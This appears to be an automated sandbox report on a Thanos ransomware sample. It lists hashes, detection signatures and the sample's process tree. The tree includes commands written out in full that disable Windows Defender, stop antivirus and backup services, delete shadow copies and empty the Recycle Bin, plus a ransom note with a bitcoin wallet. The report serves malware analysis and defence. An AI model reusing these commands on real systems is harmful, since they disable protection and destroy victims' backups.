Overview
overview
10Static
static
100033c6e1db...le.exe
windows7_x64
100033c6e1db...le.exe
windows10_x64
1002665fcf9c...le.exe
windows7_x64
1002665fcf9c...le.exe
windows10_x64
101c4b55fefc...le.exe
windows7_x64
101c4b55fefc...le.exe
windows10_x64
1048be948c33...le.exe
windows7_x64
1048be948c33...le.exe
windows10_x64
10714f630043...le.exe
windows7_x64
10714f630043...le.exe
windows10_x64
107932343454...le.exe
windows7_x64
107932343454...le.exe
windows10_x64
10aa3e530d45...le.exe
windows7_x64
8aa3e530d45...le.exe
windows10_x64
10b6f774f469...le.exe
windows7_x64
10b6f774f469...le.exe
windows10_x64
10b739791dd0...le.exe
windows7_x64
10b739791dd0...le.exe
windows10_x64
10d6cb46d0b3...le.exe
windows7_x64
10d6cb46d0b3...le.exe
windows10_x64
10e1c46a96ef...le.exe
windows7_x64
10e1c46a96ef...le.exe
windows10_x64
10Analysis
-
max time kernel
56s -
max time network
152s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
28-05-2021 09:57
Static task
static1
Behavioral task
behavioral1
Sample
0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe
Resource
win10v20210408
Behavioral task
behavioral3
Sample
02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
Resource
win7v20210410
Behavioral task
behavioral4
Sample
02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
Resource
win10v20210408
Behavioral task
behavioral5
Sample
1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
Resource
win7v20210410
Behavioral task
behavioral6
Sample
1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
Resource
win10v20210410
Behavioral task
behavioral7
Sample
48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
Resource
win7v20210408
Behavioral task
behavioral8
Sample
48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
Resource
win10v20210410
Behavioral task
behavioral9
Sample
714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
Resource
win7v20210408
Behavioral task
behavioral10
Sample
714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
Resource
win10v20210410
Behavioral task
behavioral11
Sample
79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
Resource
win7v20210408
Behavioral task
behavioral12
Sample
79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
Resource
win10v20210410
Behavioral task
behavioral13
Sample
aa3e530d4567c1511126029fac0562ba8aa4ead0a01aceea169ade3e38a37ea7.bin.sample.exe
Resource
win7v20210410
Behavioral task
behavioral14
Sample
aa3e530d4567c1511126029fac0562ba8aa4ead0a01aceea169ade3e38a37ea7.bin.sample.exe
Resource
win10v20210408
Behavioral task
behavioral15
Sample
b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
Resource
win7v20210410
Behavioral task
behavioral16
Sample
b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
Resource
win10v20210408
Behavioral task
behavioral17
Sample
b739791dd0b159c6c5c7a9f9b2f8ea7fc0c0c43c55561f94128e0863ac890424.bin.sample.exe
Resource
win7v20210410
Behavioral task
behavioral18
Sample
b739791dd0b159c6c5c7a9f9b2f8ea7fc0c0c43c55561f94128e0863ac890424.bin.sample.exe
Resource
win10v20210408
Behavioral task
behavioral19
Sample
d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe
Resource
win7v20210410
Behavioral task
behavioral20
Sample
d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe
Resource
win10v20210410
Behavioral task
behavioral21
Sample
e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe
Resource
win7v20210408
Behavioral task
behavioral22
Sample
e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe
Resource
win10v20210408
General
-
Target
b739791dd0b159c6c5c7a9f9b2f8ea7fc0c0c43c55561f94128e0863ac890424.bin.sample.exe
-
Size
393KB
-
MD5
104b68a8b7e2913139049b30847f990f
-
SHA1
0f25791a039298be94a3d024f5a3d1796e13a587
-
SHA256
b739791dd0b159c6c5c7a9f9b2f8ea7fc0c0c43c55561f94128e0863ac890424
-
SHA512
cba38f93247621cc38ea33f72efc1147e0a6d1a8b9256a26853ac3c1c8c3c9444d2d3a5af586e934febad1822c93fbc1e9c538759b4587720ba03a92792ce04d
Malware Config
Signatures
-
Contains code to disable Windows Defender 2 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
resource yara_rule behavioral18/files/0x000200000001ab26-115.dat disable_win_def behavioral18/files/0x000200000001ab26-116.dat disable_win_def -
Thanos Ransomware
Ransomware-as-a-service (RaaS) sold through underground forums.
-
Thanos executable 2 IoCs
resource yara_rule behavioral18/files/0x000200000001ab26-115.dat family_thanos_ransomware behavioral18/files/0x000200000001ab26-116.dat family_thanos_ransomware -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Executes dropped EXE 1 IoCs
pid Process 4016 file.exe -
Modifies extensions of user files 7 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File created C:\Users\Admin\Pictures\DisableClose.tiff.crypted file.exe File opened for modification C:\Users\Admin\Pictures\DisableClose.tiff file.exe File created C:\Users\Admin\Pictures\RenameRemove.tiff.crypted file.exe File opened for modification C:\Users\Admin\Pictures\RenameRemove.tiff file.exe File created C:\Users\Admin\Pictures\StepGroup.tiff.crypted file.exe File opened for modification C:\Users\Admin\Pictures\StepGroup.tiff file.exe File created C:\Users\Admin\Pictures\ConvertToUnregister.png.crypted file.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk file.exe -
Enumerates connected drives 3 TTPs 18 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\f: vssadmin.exe File opened (read-only) \??\E: vssadmin.exe File opened (read-only) \??\f: vssadmin.exe File opened (read-only) \??\h: vssadmin.exe File opened (read-only) \??\H: vssadmin.exe File opened (read-only) \??\G: vssadmin.exe File opened (read-only) \??\H: vssadmin.exe File opened (read-only) \??\E: vssadmin.exe File opened (read-only) \??\G: vssadmin.exe File opened (read-only) \??\h: vssadmin.exe File opened (read-only) \??\e: vssadmin.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\g: vssadmin.exe File opened (read-only) \??\e: vssadmin.exe File opened (read-only) \??\D: vssadmin.exe File opened (read-only) \??\D: vssadmin.exe File opened (read-only) \??\g: vssadmin.exe -
Modifies WinLogon 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Information..." file.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "Your Files are Encrypted.\r\n\r\nDon’t worry, you can return all your files!\r\n\r\nYou've got 48 hours(2 Days), before you lost your files forever.\r\nI will treat you good if you treat me good too.\r\n\r\nThe Price to get all things to the normal : 20,000$\r\nMy BTC Wallet ID :\r\n1F6sq8YvftTfuE4QcYxfK8s5XFUUHC7sD9\r\n\r\nContact :\r\[email protected]\r\n" file.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Interacts with shadow copies 2 TTPs 14 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2160 vssadmin.exe 2072 vssadmin.exe 1320 vssadmin.exe 4540 vssadmin.exe 4504 vssadmin.exe 4672 vssadmin.exe 4012 vssadmin.exe 4100 vssadmin.exe 2100 vssadmin.exe 1844 vssadmin.exe 1164 vssadmin.exe 4120 vssadmin.exe 4736 vssadmin.exe 4560 vssadmin.exe -
Kills process with taskkill 3 IoCs
pid Process 4312 taskkill.exe 2356 taskkill.exe 4076 taskkill.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 4828 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4016 file.exe 4016 file.exe 4016 file.exe 4016 file.exe 4016 file.exe 4016 file.exe 4016 file.exe 4016 file.exe 4016 file.exe 4016 file.exe 4016 file.exe 4016 file.exe 4016 file.exe 4016 file.exe 4016 file.exe 4016 file.exe 4016 file.exe 4016 file.exe 4016 file.exe 4016 file.exe 4016 file.exe 4016 file.exe 4016 file.exe 4016 file.exe 4016 file.exe 4016 file.exe 4016 file.exe 4016 file.exe 4016 file.exe 4016 file.exe 4016 file.exe 4016 file.exe 4016 file.exe 4016 file.exe 4016 file.exe 4016 file.exe 4016 file.exe 4016 file.exe 4016 file.exe 4016 file.exe 4016 file.exe 4016 file.exe 4016 file.exe 4016 file.exe 4016 file.exe 4016 file.exe 4016 file.exe 4016 file.exe 4016 file.exe 4016 file.exe 4016 file.exe 4016 file.exe 4016 file.exe 4016 file.exe 4016 file.exe 4016 file.exe 4016 file.exe 4016 file.exe 4016 file.exe 4016 file.exe 4016 file.exe 4016 file.exe 4016 file.exe 4016 file.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4016 file.exe Token: SeDebugPrivilege 1744 powershell.exe Token: SeIncreaseQuotaPrivilege 1744 powershell.exe Token: SeSecurityPrivilege 1744 powershell.exe Token: SeTakeOwnershipPrivilege 1744 powershell.exe Token: SeLoadDriverPrivilege 1744 powershell.exe Token: SeSystemProfilePrivilege 1744 powershell.exe Token: SeSystemtimePrivilege 1744 powershell.exe Token: SeProfSingleProcessPrivilege 1744 powershell.exe Token: SeIncBasePriorityPrivilege 1744 powershell.exe Token: SeCreatePagefilePrivilege 1744 powershell.exe Token: SeBackupPrivilege 1744 powershell.exe Token: SeRestorePrivilege 1744 powershell.exe Token: SeShutdownPrivilege 1744 powershell.exe Token: SeDebugPrivilege 1744 powershell.exe Token: SeSystemEnvironmentPrivilege 1744 powershell.exe Token: SeRemoteShutdownPrivilege 1744 powershell.exe Token: SeUndockPrivilege 1744 powershell.exe Token: SeManageVolumePrivilege 1744 powershell.exe Token: 33 1744 powershell.exe Token: 34 1744 powershell.exe Token: 35 1744 powershell.exe Token: 36 1744 powershell.exe Token: SeDebugPrivilege 1524 powershell.exe Token: SeDebugPrivilege 1312 powershell.exe Token: SeDebugPrivilege 3972 powershell.exe Token: SeDebugPrivilege 1872 powershell.exe Token: SeDebugPrivilege 2860 powershell.exe Token: SeDebugPrivilege 4124 Process not Found Token: SeDebugPrivilege 4188 powershell.exe Token: SeDebugPrivilege 4292 powershell.exe Token: SeDebugPrivilege 4392 Conhost.exe Token: SeIncreaseQuotaPrivilege 1312 powershell.exe Token: SeSecurityPrivilege 1312 powershell.exe Token: SeTakeOwnershipPrivilege 1312 powershell.exe Token: SeLoadDriverPrivilege 1312 powershell.exe Token: SeSystemProfilePrivilege 1312 powershell.exe Token: SeSystemtimePrivilege 1312 powershell.exe Token: SeProfSingleProcessPrivilege 1312 powershell.exe Token: SeIncBasePriorityPrivilege 1312 powershell.exe Token: SeCreatePagefilePrivilege 1312 powershell.exe Token: SeBackupPrivilege 1312 powershell.exe Token: SeRestorePrivilege 1312 powershell.exe Token: SeShutdownPrivilege 1312 powershell.exe Token: SeDebugPrivilege 1312 powershell.exe Token: SeSystemEnvironmentPrivilege 1312 powershell.exe Token: SeRemoteShutdownPrivilege 1312 powershell.exe Token: SeUndockPrivilege 1312 powershell.exe Token: SeManageVolumePrivilege 1312 powershell.exe Token: 33 1312 powershell.exe Token: 34 1312 powershell.exe Token: 35 1312 powershell.exe Token: 36 1312 powershell.exe Token: SeDebugPrivilege 4876 sc.exe Token: SeDebugPrivilege 4932 powershell.exe Token: SeIncreaseQuotaPrivilege 1524 powershell.exe Token: SeSecurityPrivilege 1524 powershell.exe Token: SeTakeOwnershipPrivilege 1524 powershell.exe Token: SeLoadDriverPrivilege 1524 powershell.exe Token: SeSystemProfilePrivilege 1524 powershell.exe Token: SeSystemtimePrivilege 1524 powershell.exe Token: SeProfSingleProcessPrivilege 1524 powershell.exe Token: SeIncBasePriorityPrivilege 1524 powershell.exe Token: SeCreatePagefilePrivilege 1524 powershell.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 4016 file.exe 4016 file.exe 4016 file.exe -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 4016 file.exe 4016 file.exe 4016 file.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3260 wrote to memory of 4016 3260 b739791dd0b159c6c5c7a9f9b2f8ea7fc0c0c43c55561f94128e0863ac890424.bin.sample.exe 71 PID 3260 wrote to memory of 4016 3260 b739791dd0b159c6c5c7a9f9b2f8ea7fc0c0c43c55561f94128e0863ac890424.bin.sample.exe 71 PID 4016 wrote to memory of 1744 4016 file.exe 76 PID 4016 wrote to memory of 1744 4016 file.exe 76 PID 4016 wrote to memory of 1524 4016 file.exe 80 PID 4016 wrote to memory of 1524 4016 file.exe 80 PID 4016 wrote to memory of 1312 4016 file.exe 82 PID 4016 wrote to memory of 1312 4016 file.exe 82 PID 4016 wrote to memory of 3972 4016 file.exe 84 PID 4016 wrote to memory of 3972 4016 file.exe 84 PID 4016 wrote to memory of 1872 4016 file.exe 86 PID 4016 wrote to memory of 1872 4016 file.exe 86 PID 4016 wrote to memory of 2860 4016 file.exe 88 PID 4016 wrote to memory of 2860 4016 file.exe 88 PID 4016 wrote to memory of 4124 4016 file.exe 90 PID 4016 wrote to memory of 4124 4016 file.exe 90 PID 4016 wrote to memory of 4188 4016 file.exe 92 PID 4016 wrote to memory of 4188 4016 file.exe 92 PID 4016 wrote to memory of 4292 4016 file.exe 95 PID 4016 wrote to memory of 4292 4016 file.exe 95 PID 4016 wrote to memory of 4392 4016 file.exe 212 PID 4016 wrote to memory of 4392 4016 file.exe 212 PID 4016 wrote to memory of 4876 4016 file.exe 248 PID 4016 wrote to memory of 4876 4016 file.exe 248 PID 4016 wrote to memory of 4932 4016 file.exe 100 PID 4016 wrote to memory of 4932 4016 file.exe 100 PID 4016 wrote to memory of 4156 4016 file.exe 102 PID 4016 wrote to memory of 4156 4016 file.exe 102 PID 4016 wrote to memory of 2848 4016 file.exe 104 PID 4016 wrote to memory of 2848 4016 file.exe 104 PID 2848 wrote to memory of 4312 2848 net.exe 243 PID 2848 wrote to memory of 4312 2848 net.exe 243 PID 4016 wrote to memory of 2456 4016 file.exe 107 PID 4016 wrote to memory of 2456 4016 file.exe 107 PID 4016 wrote to memory of 2636 4016 file.exe 110 PID 4016 wrote to memory of 2636 4016 file.exe 110 PID 4016 wrote to memory of 1520 4016 file.exe 108 PID 4016 wrote to memory of 1520 4016 file.exe 108 PID 4016 wrote to memory of 3356 4016 file.exe 111 PID 4016 wrote to memory of 3356 4016 file.exe 111 PID 4016 wrote to memory of 4224 4016 file.exe 177 PID 4016 wrote to memory of 4224 4016 file.exe 177 PID 4016 wrote to memory of 4204 4016 file.exe 115 PID 4016 wrote to memory of 4204 4016 file.exe 115 PID 4016 wrote to memory of 3832 4016 file.exe 113 PID 4016 wrote to memory of 3832 4016 file.exe 113 PID 4016 wrote to memory of 4360 4016 file.exe 176 PID 4016 wrote to memory of 4360 4016 file.exe 176 PID 4016 wrote to memory of 3836 4016 file.exe 175 PID 4016 wrote to memory of 3836 4016 file.exe 175 PID 2456 wrote to memory of 184 2456 net.exe 256 PID 2456 wrote to memory of 184 2456 net.exe 256 PID 4016 wrote to memory of 668 4016 file.exe 120 PID 4016 wrote to memory of 668 4016 file.exe 120 PID 2636 wrote to memory of 188 2636 net.exe 207 PID 2636 wrote to memory of 188 2636 net.exe 207 PID 4016 wrote to memory of 3640 4016 file.exe 173 PID 4016 wrote to memory of 3640 4016 file.exe 173 PID 4016 wrote to memory of 1188 4016 file.exe 172 PID 4016 wrote to memory of 1188 4016 file.exe 172 PID 1520 wrote to memory of 496 1520 net.exe 171 PID 1520 wrote to memory of 496 1520 net.exe 171 PID 4016 wrote to memory of 4040 4016 file.exe 169 PID 4016 wrote to memory of 4040 4016 file.exe 169
Processes
-
C:\Users\Admin\AppData\Local\Temp\b739791dd0b159c6c5c7a9f9b2f8ea7fc0c0c43c55561f94128e0863ac890424.bin.sample.exe"C:\Users\Admin\AppData\Local\Temp\b739791dd0b159c6c5c7a9f9b2f8ea7fc0c0c43c55561f94128e0863ac890424.bin.sample.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3260 -
C:\Users\Admin\AppData\Local\Temp\file.exe"file.exe"2⤵
- Executes dropped EXE
- Modifies extensions of user files
- Drops startup file
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4016 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1744
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1524
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1312
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3972
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1872
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2860
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force3⤵PID:4124
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 63⤵
- Suspicious use of AdjustPrivilegeToken
PID:4188
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:4292
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 63⤵PID:4392
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 63⤵PID:4876
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4932
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 23⤵PID:4156
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop avpsus /y3⤵
- Suspicious use of WriteProcessMemory
PID:2848 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop avpsus /y4⤵PID:4312
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop McAfeeDLPAgentService /y3⤵
- Suspicious use of WriteProcessMemory
PID:2456 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeDLPAgentService /y4⤵PID:184
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BMR Boot Service /y3⤵
- Suspicious use of WriteProcessMemory
PID:1520 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BMR Boot Service /y4⤵PID:496
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop mfewc /y3⤵
- Suspicious use of WriteProcessMemory
PID:2636 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfewc /y4⤵PID:188
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop NetBackup BMR MTFTP Service /y3⤵PID:3356
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y4⤵PID:3676
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ccSetMgr /y3⤵PID:3832
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccSetMgr /y4⤵PID:4340
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ccEvtMgr /y3⤵PID:4204
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccEvtMgr /y4⤵PID:4252
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop QBFCService /y3⤵PID:668
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBFCService /y4⤵PID:4492
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop YooIT /y3⤵PID:4824
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop YooIT /y4⤵PID:2172
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop zhudongfangyu /y3⤵PID:4380
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop zhudongfangyu /y4⤵PID:4192
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop stc_raw_agent /y3⤵PID:4184
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop stc_raw_agent /y4⤵PID:4244
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VSNAPVSS /y3⤵PID:3844
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VSNAPVSS /y4⤵PID:4332
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamDeploymentService /y3⤵PID:4820
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y4⤵PID:4168
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamTransportSvc /y3⤵PID:4352
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y4⤵PID:3644
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop YooBackup /y3⤵PID:4628
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop YooBackup /y4⤵PID:4104
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop veeam /y3⤵PID:5028
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop veeam /y4⤵PID:5196
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamNFSSvc /y3⤵PID:4152
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y4⤵PID:5004
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop PDVFSService /y3⤵PID:4480
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop PDVFSService /y4⤵PID:5412
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecAgentBrowser /y3⤵PID:4852
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y4⤵PID:5536
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecAgentAccelerator /y3⤵PID:4960
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y4⤵PID:5436
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecJobEngine /y3⤵PID:4400
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y4⤵PID:5608
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecDiveciMediaService /y3⤵PID:4256
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecDiveciMediaService /y4⤵PID:5600
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecVSSProvider /y3⤵PID:5008
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y4⤵PID:2108
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop QBCFMonitorService /y3⤵PID:4040
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop Intuit.QuickBooks.FCS /y3⤵PID:1188
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop QBIDPService /y3⤵PID:3640
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop RTVscan /y3⤵PID:3836
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SavRoam /y3⤵PID:4360
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop DefWatch /y3⤵PID:4224
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecManagementService /y3⤵PID:5020
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y4⤵PID:5836
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecRPCService /y3⤵PID:5024
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y4⤵PID:5844
-
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SstpSvc start= disabled3⤵PID:4316
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin3⤵PID:2220
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:4540
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4120
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4504
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4672
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4736
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1844
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1164
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4560
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4100
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4012
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2160
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:2072
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB3⤵
- Interacts with shadow copies
PID:1320
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:2100
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F3⤵
- Kills process with taskkill
PID:4076
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F3⤵
- Kills process with taskkill
PID:4312
-
-
